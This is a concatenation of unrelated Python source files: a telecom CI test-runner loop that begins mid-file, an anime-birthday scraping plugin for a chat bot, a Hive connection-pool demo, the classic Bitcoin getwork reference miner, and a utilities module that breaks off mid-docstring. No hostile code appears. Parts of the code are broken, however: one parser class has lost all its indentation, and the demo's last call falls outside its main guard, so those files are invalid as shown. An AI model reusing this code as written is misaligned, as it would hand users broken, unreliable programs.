		HTML.htmlNb_CATM_Modules=len(CiTestObj.CatMDevices)
	HTML.CreateHtmlHeader(CiTestObj.ADBIPAddress)
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
	logging.debug('\u001B[1m----------------------------------------\u001B[0m')
	logging.debug('\u001B[1m  Creating HTML footer \u001B[0m')
	logging.debug('\u001B[1m----------------------------------------\u001B[0m')
	CiTestObj.RetrieveSystemVersion('eNB')
	CiTestObj.RetrieveSystemVersion('UE')
	HTML.CreateHtmlFooter(CiTestObj.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
	if re.match('^TesteNB$', mode, re.IGNORECASE):
		if RAN.eNBIPAddress == '' or RAN.ranRepository == '' or RAN.ranBranch == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '' or EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '' or CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '' or EPC.Type == '':
				HELP.EPCSrvHelp(EPC.IPAddress, EPC.UserName, EPC.Password, EPC.SourceCodePath, EPC.Type)
			if RAN.ranRepository == '':
				HELP.GitSrvHelp(RAN.ranRepository, RAN.ranBranch, RAN.ranCommitID, RAN.ranAllowMerge, RAN.ranTargetBranch)
			if RAN.eNBIPAddress == ''  or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '':
				HELP.eNBSrvHelp(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath)
			sys.exit('Insufficient Parameter')
		if (EPC.IPAddress!= '') and (EPC.IPAddress != 'none'):
			SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, cwd + "/tcp_iperf_stats.awk", "/tmp")
			SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, cwd + "/active_net_interfaces.awk", "/tmp")
	else:
		if CiTestObj.UEIPAddress == '' or CiTestObj.ranRepository == '' or CiTestObj.ranBranch == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('UE: Insufficient Parameter')
	#read test_case_list.xml file
	# if no parameters for XML file, use default value
	if (HTML.nbTestXMLfiles != 1):
		xml_test_file = cwd + "/test_case_list.xml"
	else:
		xml_test_file = cwd + "/" + CiTestObj.testXMLfiles[0]
	xmlTree = ET.parse(xml_test_file)
	xmlRoot = xmlTree.getroot()
	exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
	requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
	if (HTML.nbTestXMLfiles == 1):
		HTML.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
		HTML.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
	repeatCount = xmlRoot.findtext('repeatCount',default='1')
	CiTestObj.repeatCounts.append(int(repeatCount))
	all_tests=xmlRoot.findall('testCase')
	exclusion_tests=exclusion_tests.split()
	requested_tests=requested_tests.split()
	#check that exclusion tests are well formatted
	#(6 digits or less than 6 digits followed by +)
	for test in exclusion_tests:
		if     (not re.match('^[0-9]{6}$', test) and
				not re.match('^[0-9]{1,5}\+$', test)):
			logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
			sys.exit(1)
		else:
			logging.debug(test)
	#check that requested tests are well formatted
	#(6 digits or less than 6 digits followed by +)
	#be verbose
	for test in requested_tests:
		if     (re.match('^[0-9]{6}$', test) or
				re.match('^[0-9]{1,5}\+$', test)):
			logging.debug('INFO: test group/case requested: ' + test)
		else:
			logging.debug('ERROR: requested test is invalidly formatted: ' + test)
			sys.exit(1)
	if (EPC.IPAddress != '') and (EPC.IPAddress != 'none'):
		CiTestObj.CheckFlexranCtrlInstallation()
		EPC.SetMmeIPAddress()
	#get the list of tests to be done
	todo_tests=[]
	for test in requested_tests:
		if    (test_in_list(test, exclusion_tests)):
			logging.debug('INFO: test will be skipped: ' + test)
		else:
			#logging.debug('INFO: test will be run: ' + test)
			todo_tests.append(test)
	signal.signal(signal.SIGUSR1, receive_signal)
	if (CiTestObj.ADBIPAddress != 'none'):
		terminate_ue_flag = False
		CiTestObj.GetAllUEDevices(terminate_ue_flag)
		CiTestObj.GetAllCatMDevices(terminate_ue_flag)
	else:
		CiTestObj.UEDevices.append('OAI-UE')
	HTML.SethtmlUEConnected(len(CiTestObj.UEDevices) + len(CiTestObj.CatMDevices))
	HTML.CreateHtmlTabHeader()
	# Retry loop: the whole scenario is re-run (up to repeatCounts[0] times)
	# as long as a test aborted early (RAN.prematureExit set by a failure).
	CiTestObj.FailReportCnt = 0
	RAN.prematureExit=True
	HTML.startTime=int(round(time.time() * 1000))
	while CiTestObj.FailReportCnt < CiTestObj.repeatCounts[0] and RAN.prematureExit:
		RAN.prematureExit=False
		# At every iteration of the retry loop, a separator will be added
		# pass CiTestObj.FailReportCnt as parameter of HTML.CreateHtmlRetrySeparator
		HTML.CreateHtmlRetrySeparator(CiTestObj.FailReportCnt)
		for test_case_id in todo_tests:
			if RAN.prematureExit:
				break
			for test in all_tests:
				if RAN.prematureExit:
					break
				id = test.get('id')
				if test_case_id != id:
					continue
				CiTestObj.testCase_id = id
				HTML.testCase_id=CiTestObj.testCase_id
				EPC.testCase_id=CiTestObj.testCase_id
				CiTestObj.desc = test.findtext('desc')
				HTML.desc=CiTestObj.desc
				action = test.findtext('class')
				if (CheckClassValidity(xml_class_list, action, id) == False):
					continue
				CiTestObj.ShowTestID()
				GetParametersFromXML(action)
				if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
					if (CiTestObj.ADBIPAddress != 'none'):
						#in these cases, having no devices is critical, GetAllUEDevices function has to manage it as a critical error, reason why terminate_ue_flag is set to True
						terminate_ue_flag = True
						CiTestObj.GetAllUEDevices(terminate_ue_flag)
				# Dispatch the test-case class to the matching manager method.
				if action == 'Build_eNB':
					RAN.BuildeNB()
				elif action == 'WaitEndBuild_eNB':
					RAN.WaitBuildeNBisFinished()
				elif action == 'Initialize_eNB':
					check_eNB = False
					check_OAI_UE = False
					RAN.pStatus=CiTestObj.CheckProcessExist(check_eNB, check_OAI_UE)
					RAN.InitializeeNB()
				elif action == 'Terminate_eNB':
					RAN.TerminateeNB()
				elif action == 'Initialize_UE':
					CiTestObj.InitializeUE()
				elif action == 'Terminate_UE':
					CiTestObj.TerminateUE()
				elif action == 'Attach_UE':
					CiTestObj.AttachUE()
				elif action == 'Detach_UE':
					CiTestObj.DetachUE()
				elif action == 'DataDisable_UE':
					CiTestObj.DataDisableUE()
				elif action == 'DataEnable_UE':
					CiTestObj.DataEnableUE()
				elif action == 'CheckStatusUE':
					CiTestObj.CheckStatusUE()
				elif action == 'Build_OAI_UE':
					CiTestObj.BuildOAIUE()
				elif action == 'Initialize_OAI_UE':
					CiTestObj.InitializeOAIUE()
				elif action == 'Terminate_OAI_UE':
					CiTestObj.TerminateOAIUE()
				elif action == 'Initialize_CatM_module':
					CiTestObj.InitializeCatM()
				elif action == 'Terminate_CatM_module':
					CiTestObj.TerminateCatM()
				elif action == 'Attach_CatM_module':
					CiTestObj.AttachCatM()
				elif action == 'Detach_CatM_module':
					CiTestObj.TerminateCatM()
				elif action == 'Ping_CatM_module':
					CiTestObj.PingCatM()
				elif action == 'Ping':
					CiTestObj.Ping()
				elif action == 'Iperf':
					CiTestObj.Iperf()
				elif action == 'Reboot_UE':
					CiTestObj.RebootUE()
				elif action == 'Initialize_HSS':
					EPC.InitializeHSS()
				elif action == 'Terminate_HSS':
					EPC.TerminateHSS()
				elif action == 'Initialize_MME':
					EPC.InitializeMME()
				elif action == 'Terminate_MME':
					EPC.TerminateMME()
				elif action == 'Initialize_SPGW':
					EPC.InitializeSPGW()
				elif action == 'Terminate_SPGW':
					EPC.TerminateSPGW()
				elif action == 'Initialize_FlexranCtrl':
					CiTestObj.InitializeFlexranCtrl()
				elif action == 'Terminate_FlexranCtrl':
					CiTestObj.TerminateFlexranCtrl()
				elif action == 'IdleSleep':
					CiTestObj.IdleSleep()
				elif action == 'Perform_X2_Handover':
					CiTestObj.Perform_X2_Handover()
				elif action == 'Build_PhySim':
					# NOTE: the PhySim helpers return the (possibly updated)
					# HTML object, which replaces the global reference.
					HTML=ldpc.Build_PhySim(HTML,CONST)
					if ldpc.exitStatus==1:sys.exit()
				elif action == 'Run_PhySim':
					HTML=ldpc.Run_PhySim(HTML,CONST,id)
				else:
					sys.exit('Invalid class (action) from xml')
		CiTestObj.FailReportCnt += 1
	if CiTestObj.FailReportCnt == CiTestObj.repeatCounts[0] and RAN.prematureExit:
		logging.debug('Testsuite failed ' + str(CiTestObj.FailReportCnt) + ' time(s)')
		HTML.CreateHtmlTabFooter(False)
		sys.exit('Failed Scenario')
	else:
		logging.info('Testsuite passed after ' + str(CiTestObj.FailReportCnt) + ' time(s)')
		HTML.CreateHtmlTabFooter(True)
elif re.match('^LoadParams$', mode, re.IGNORECASE):
	pass
else:
	HELP.GenericHelp(CONST.Version)
	sys.exit('Invalid mode')
sys.exit(0)
|
webcrawl.py | """ Plugins to analyze websites """
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from datetime import date
from functools import lru_cache
from html.parser import HTMLParser
from http.client import HTTPResponse
from logging import getLogger
from urllib.error import URLError
from urllib.request import Request, urlopen
from threading import Thread
from typing import Callable, Dict, List, Optional, Tuple
from . import AbstractPlugin, ChatCommandEventData, ChatOutputEventData, Event
# PLUGINS
class AnimeBirthdaysPlugin(AbstractPlugin):
    """ Anime birthdays plugin class """
    def __init__(self, name: str, publish_event: Callable[[Event], None]):
        super().__init__(name, publish_event)
    def apply_event(self, event: Event):
        # Only chat commands are relevant for this plugin
        if not isinstance(event.data, ChatCommandEventData):
            return
        data: ChatCommandEventData = event.data
        if data.command == 'help':
            self._publish_event_data(ChatOutputEventData('Command: anime_birthdays', event.publisher, data.channel_id))
        elif data.command == 'anime_birthdays':
            # Show characters with todays birthday from anisearch.com;
            # fetched on a daemon thread so the bot stays responsive.
            def run():
                try:
                    lines = [
                        '{} ({}) [{}]:\n{}'.format(character.name, character.anime, character.rating, character.url)
                        for character in _get_anisearch_birthday_characters()
                    ]
                    self._publish_event_data(ChatOutputEventData(
                        'Anime birthdays:\n' + '\n'.join(lines),
                        event.publisher, data.channel_id
                    ))
                except URLError as ex:
                    self._log.error('Loading characters failed: %s', ex)
            Thread(target=run, daemon=True).start()
# REGISTRATION
def register_plugins(workers: List[AbstractPlugin], publish_event: Callable[[Event], None], _config: Dict[str,Dict[str,str]], _env: Dict[str, str]):
    """ Register local plugins to bot """
    plugin = AnimeBirthdaysPlugin('anime_birthdays', publish_event)
    workers.append(plugin)
# HELPERS
@dataclass
class _AnisearchCharacter:
    """ Mutable record for one character scraped from anisearch.com. """
    # Character name, title-cased from the page's data-title attribute
    name: str
    # Series title; filled in by a second request, None until resolved
    anime: Optional[str]
    # Popularity rating parsed from the listing page (0 when unknown)
    rating: int
    # Absolute URL of the character's detail page
    url: str
class _AnisearchBirthdayCharactersParser(HTMLParser):
    """HTML parser collecting the characters listed under one day's
    <section id="day-N"> block of the anisearch.com birthday page."""
    def __init__(self, day: int):
        # Initialization
        super().__init__()
        self._day = day
        self._rating_suffix = ' ❤'  # Text node ends with unicode heart symbol
        # Results
        self._characters: List[_AnisearchCharacter] = []
        self._log = getLogger(__name__)
        # Parser state: True while inside the requested day's section
        self._section_today = False
    def get_characters(self) -> List[_AnisearchCharacter]:
        """ Get parsed characters """
        return self._characters
    def error(self, message: str):
        self._log.error(message)
    def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]):
        attr_map = dict(attrs)
        if tag == 'section':
            if attr_map.get('id') == 'day-' + str(self._day):
                self._section_today = True
            return
        if not self._section_today or tag != 'a':
            return
        if 'data-title' not in attr_map or 'href' not in attr_map:
            return
        character_name = attr_map['data-title'].replace('Character: ', '').title()
        self._characters.append(_AnisearchCharacter(
            character_name,
            None,
            0,
            'http://www.anisearch.com/' + attr_map['href']
        ))
    def handle_endtag(self, tag: str):
        if tag == 'section':
            self._section_today = False
    def handle_data(self, data: str):
        # A heart-suffixed text node right after a character link is its rating
        if not (self._section_today and self._characters):
            return
        if not data.endswith(self._rating_suffix):
            return
        try:
            self._characters[-1].rating = int(data.replace(self._rating_suffix, ''))
        except ValueError as ex:
            self._log.error('Rating for %s: %s', self._characters[-1], ex)
class _AnisearchCharacterAnimeParser(HTMLParser):
def __init__(self):
super().__init__()
self._anime = None
self._log = getLogger(__name__)
def get_anime(self) -> str:
""" Get parsed anime """
return self._anime
def error(self, message: str):
self._log.error(message)
def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]):
if tag == 'a':
anime = [attr[1].replace('Anime: ', '') for attr in attrs if attr[0] == 'data-title' and attr[1].startswith('Anime: ')]
if anime:
self._anime = anime[0] # Always overrides, results in last / oldest anime
def _get_anisearch_birthday_characters(birthday: Optional[date] = None) -> List[_AnisearchCharacter]:
    """Return anime characters whose birthday is *birthday* (default: today),
    scraped from anisearch.com and sorted by rating, descending.

    Bug fix: the previous signature used ``birthday: date = date.today()``.
    A default argument is evaluated once at import time, so a long-running
    bot kept serving the import day's birthdays forever.  "Today" is now
    resolved at call time; results are cached per concrete date (up to a
    week) by the helper below.
    """
    return _fetch_anisearch_birthday_characters(birthday if birthday is not None else date.today())
@lru_cache(7)
def _fetch_anisearch_birthday_characters(birthday: date) -> List[_AnisearchCharacter]:
    """Fetch and parse the birthday listing for one concrete *birthday*."""
    user_agent_headers = {'User-Agent': 'Mozilla/5.0'} # Hack to prevent websites blocking bots
    http_response: HTTPResponse = None # Typing for url responses of http requests
    # Find characters by birthday
    with urlopen(Request(
            'http://www.anisearch.com/character/birthdays?month=' + str(birthday.month),
            headers=user_agent_headers
    )) as http_response:
        parser = _AnisearchBirthdayCharactersParser(birthday.day)
        parser.feed(str(http_response.read(), 'utf-8'))
        characters = parser.get_characters()
    # Add anime to characters (one request per character, fetched in parallel)
    def add_anime(character: _AnisearchCharacter):
        with urlopen(Request(
                character.url,
                headers=user_agent_headers
        )) as http_response:
            parser = _AnisearchCharacterAnimeParser()
            parser.feed(str(http_response.read(), 'utf-8'))
            character.anime = parser.get_anime()
    with ThreadPoolExecutor() as pool:
        pool.map(add_anime, characters)
    # Restrict to anime characters and sort by rating
    return sorted(
        (character for character in characters if character.anime),
        key=lambda c: c.rating,
        reverse=True
    )
|
hive_demo.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/5/12 12:12
# @Author : ysy
# @Site :
# @File : hive_demo.py
# @Software: PyCharm
from hivepool.hive_pool import get_hive_pool, HivePool
import threading
import time
import uuid
import random
host = "cdh070"
port = 10000
database = "guotie"
def query(sleep=0):
    """Run one probe query against the pooled Hive connection.

    When ``sleep`` is truthy, the connection stays checked out for a
    random 2-3 s pause (the value of ``sleep`` itself is not the
    duration), so concurrent callers actually contend for the pool.
    """
    pool = get_hive_pool(host, port=port, database=database, timeout=3)
    query_id = uuid.uuid1()
    print("{} start".format(query_id))
    with pool.open() as cursor:
        print(query_id, "enter")
        cursor.execute("select * from test_hive_alarm_id")
        print(query_id, cursor.fetchone())
        if not sleep:
            return
        time.sleep(random.randrange(2, 4))
        print(query_id, "exit")
def multi_query():
    """Launch 20 concurrent query() threads to stress the connection pool."""
    for _ in range(20):
        threading.Thread(target=query, args=(10,)).start()
if __name__ == '__main__':
multi_query() |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    # Minimal JSON-RPC 1.1 client for talking to a local bitcoind.
    # Python 2 only (httplib, print statements).
    OBJID = 1

    def __init__(self, host, port, username, password):
        # Basic-auth header is built once; one persistent HTTP
        # connection with a 30 second timeout.
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        # Issue a single JSON-RPC call and return its 'result' field,
        # or None on transport/decode problems.
        # NOTE(review): on an RPC-level failure the *error object* is
        # returned to the caller instead of being raised -- callers must
        # distinguish it from a real result themselves.
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']

    def getblockcount(self):
        # Convenience wrapper for the 'getblockcount' RPC.
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        # 'getwork' fetches new work when data is None,
        # or submits a solved block when data is given.
        return self.rpc('getwork', data)
def uint32(x):
    # Truncate to an unsigned 32-bit value (Python 2 long literal).
    return x & 0xffffffffL
def bytereverse(x):
    # Reverse the byte order of one 32-bit word (endianness swap).
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
        (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    # Byte-swap every 32-bit word of a binary string.
    # Assumes len(in_buf) is a multiple of 4.
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    # Reverse the order of the 32-bit words in a binary string
    # (bytes inside each word keep their order).
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    # One getwork miner: fetches work over RPC, scans a nonce range for a
    # double-SHA256 hash below the target, and submits any solution found.

    def __init__(self, id):
        self.id = id
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        # Scan nonces 0..max_nonce-1 for the given work unit.
        # Returns (hashes_done, nonce_bin) where nonce_bin is the packed
        # winning nonce or None if the range was exhausted.
        # NOTE(review): if max_nonce is ever 0, the final 'return' would
        # hit an unbound 'nonce' -- confirm max_nonce stays positive.
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)

            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)

        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        # Splice the solved nonce back into the original getwork data
        # (hex characters 152:160 hold the nonce field) and submit it.
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        # One mining round: fetch work, scan it, retune max_nonce so one
        # scan takes about settings['scantime'] seconds, submit if solved.
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
            work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # Scale the nonce range to the measured hash rate, capped below 2^32.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        # Mine forever against the configured RPC endpoint.
        rpc = BitcoinRPC(settings['host'], settings['port'],
            settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    # Entry point for one worker process: run a Miner's infinite loop.
    miner = Miner(id)
    miner.loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # Parse a simple key=value config file, ignoring '#' comment lines.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Fill in defaults for anything the config file omitted.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 10109
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Config values arrive as strings; normalize the numeric ones.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # Despite the name, each mining "thread" is a separate process,
    # so the GIL does not serialize the hashing work.
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
utils.py | import concurrent.futures
from collections.abc import Iterable
import copy
from distutils.version import LooseVersion
import functools
import hashlib
import inspect
import multiprocessing
import queue
import subprocess
import threading
import typing
import uuid
import warnings
from audeer.core import tqdm
__doctest_skip__ = ['git_repo_tags', 'git_repo_version']
def deprecated(
        *,
        removal_version: str,
        alternative: str = None
) -> typing.Callable:
    r"""Decorator that marks functions/classes as deprecated.

    Every call of the decorated object raises a ``UserWarning``
    stating the version in which it will be removed
    and, optionally, what to use instead.
    Small changes (renamed function/argument) are usually removed
    with the next minor release (`X.(Y+1).Z`),
    everything else with the next major release (`(X+1).Y.Z`).

    Args:
        removal_version: version the code will be removed
        alternative: alternative code to use

    Example:
        >>> @deprecated(removal_version='2.0.0')
        ... def deprecated_function():
        ...     pass

    """
    def wrap(obj):
        # functools.wraps keeps the wrapped object's name and docstring.
        @functools.wraps(obj)
        def wrapper(*args, **kwargs):
            parts = [
                f'{obj.__name__} is deprecated and will be removed '
                f'with version {removal_version}.'
            ]
            if alternative is not None:
                parts.append(f' Use {alternative} instead.')
            warnings.warn(''.join(parts), category=UserWarning, stacklevel=2)
            return obj(*args, **kwargs)
        return wrapper
    return wrap
def deprecated_default_value(
        *,
        argument: str,
        change_in_version: str,
        new_default_value: typing.Any,
) -> typing.Callable:
    r"""Decorator warning that a keyword argument's default will change.

    As long as the caller does not pass ``argument`` explicitly,
    a ``UserWarning`` announces the current default value
    and the default that will apply from ``change_in_version`` on.

    Args:
        argument: keyword argument
        change_in_version: version the default value will change
        new_default_value: new default value

    Example:
        >>> @deprecated_default_value(
        ...     argument='foo',
        ...     change_in_version='2.0.0',
        ...     new_default_value='bar',
        ... )
        ... def deprecated_function(foo='foo'):
        ...     pass

    """
    def wrap(obj):
        # functools.wraps keeps the wrapped object's name and docstring.
        @functools.wraps(obj)
        def wrapper(*args, **kwargs):
            if argument not in kwargs:
                current = inspect.signature(obj).parameters[argument].default
                warnings.warn(
                    f"The default of '{argument}' will change from "
                    f"'{current}' to '{new_default_value}' "
                    f'with version {change_in_version}.',
                    category=UserWarning,
                    stacklevel=2,
                )
            return obj(*args, **kwargs)
        return wrapper
    return wrap
def deprecated_keyword_argument(
        *,
        deprecated_argument: str,
        removal_version: str,
        new_argument: str = None,
        mapping: typing.Callable = None,
) -> typing.Callable:
    r"""Decorator that marks a keyword argument as deprecated.

    When a caller still uses ``deprecated_argument``,
    a ``UserWarning`` is raised
    and the supplied value is forwarded to ``new_argument``,
    optionally translated through ``mapping``.

    Args:
        deprecated_argument: keyword argument to be marked as deprecated
        removal_version: version the code will be removed
        new_argument: keyword argument that should be used instead
        mapping: if the keyword argument is not only renamed,
            but expects also different input values,
            you can map to the new ones with this callable

    Example:
        >>> @deprecated_keyword_argument(
        ...     deprecated_argument='foo',
        ...     new_argument='bar',
        ...     removal_version='2.0.0',
        ... )
        ... def function_with_new_argument(*, bar):
        ...     pass

    """
    def wrap(obj):
        # functools.wraps keeps the wrapped object's name and docstring.
        @functools.wraps(obj)
        def wrapper(*args, **kwargs):
            if deprecated_argument in kwargs:
                text = (
                    f"'{deprecated_argument}' argument is deprecated "
                    f"and will be removed with version {removal_version}."
                )
                value = kwargs.pop(deprecated_argument)
                if new_argument is not None:
                    text += f" Use '{new_argument}' instead."
                    kwargs[new_argument] = (
                        value if mapping is None else mapping(value)
                    )
                warnings.warn(text, category=UserWarning, stacklevel=2)
            return obj(*args, **kwargs)
        return wrapper
    return wrap
def flatten_list(
        nested_list: typing.List
) -> typing.List:
    """Flatten an arbitrarily nested list.

    Implemented without recursion to avoid stack overflows.
    Returns a new list, the original list is unchanged
    and the returned list contains the original elements.

    Args:
        nested_list: nested list

    Returns:
        flattened list

    Example:
        >>> flatten_list([1, 2, 3, [4], [], [[[[[[[[[5]]]]]]]]]])
        [1, 2, 3, 4, 5]
        >>> flatten_list([[1, 2], 3])
        [1, 2, 3]

    """
    # Depth-first walk over a stack of iterators.  This replaces the
    # previous ``copy.deepcopy`` + destructive ``pop(0)`` approach, which
    # copied every element (quadratic pops, and it failed for elements
    # that cannot be deep-copied) just to protect the caller's list.
    result = []
    stack = [iter(nested_list)]
    while stack:
        for item in stack[-1]:
            if isinstance(item, list):
                # Descend into the sublist; the outer iterator resumes later.
                stack.append(iter(item))
                break
            result.append(item)
        else:
            stack.pop()
    return result
def freeze_requirements(outfile: str):
    r"""Log Python packages of activate virtual environment.

    Args:
        outfile: file to store the packages.
            Usually a name like :file:`requirements.txt.lock` should be picked.

    Raises:
        RuntimeError: if running ``pip freeze`` returns an error

    """
    # Run pip without a shell and write its stdout ourselves.  The previous
    # implementation interpolated ``outfile`` into a shell command
    # (``pip freeze > {outfile}`` with ``shell=True``), which breaks for
    # paths containing spaces and allows shell injection.
    try:
        with subprocess.Popen(
                args=['pip', 'freeze'],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
        ) as p:
            out, err = p.communicate()
    except OSError as error:
        # Keep the documented RuntimeError contract if pip cannot be run.
        raise RuntimeError(f'Freezing Python packages failed: {error}')
    if bool(p.returncode):
        raise RuntimeError(f'Freezing Python packages failed: {err}')
    with open(outfile, 'wb') as fp:
        fp.write(out)
def git_repo_tags(
        *,
        v: bool = None,
) -> typing.List:
    r"""Get a list of available git tags.

    Runs ``git tag`` in the current folder;
    if that fails, an empty list is returned.

    Args:
        v: if ``True`` tags start always with ``v``,
            if ``False`` they never start with ``v``,
            if ``None`` the original tag names are returned

    Returns:
        list of tags

    Example:
        >>> git_repo_tags()
        ['v1.0.0', 'v1.1.0', 'v2.0.0']

    """
    try:
        output = subprocess.check_output(['git', 'tag'])
        tags = output.decode().strip().split('\n')
    except Exception:  # pragma: nocover
        tags = []
    if v is None:
        return tags
    if v:
        return [tag if tag.startswith('v') else f'v{tag}' for tag in tags]
    return [tag[1:] if tag.startswith('v') else tag for tag in tags]
def git_repo_version(
        *,
        v: bool = True,
) -> str:
    r"""Get a version number from current git ref.

    Runs ``git describe --tags --always``;
    if that fails, ``'<unknown>'`` is used as the version.

    Args:
        v: if ``True`` version starts always with ``v``,
            otherwise it never starts with ``v``

    Returns:
        version number

    Example:
        >>> git_repo_version()
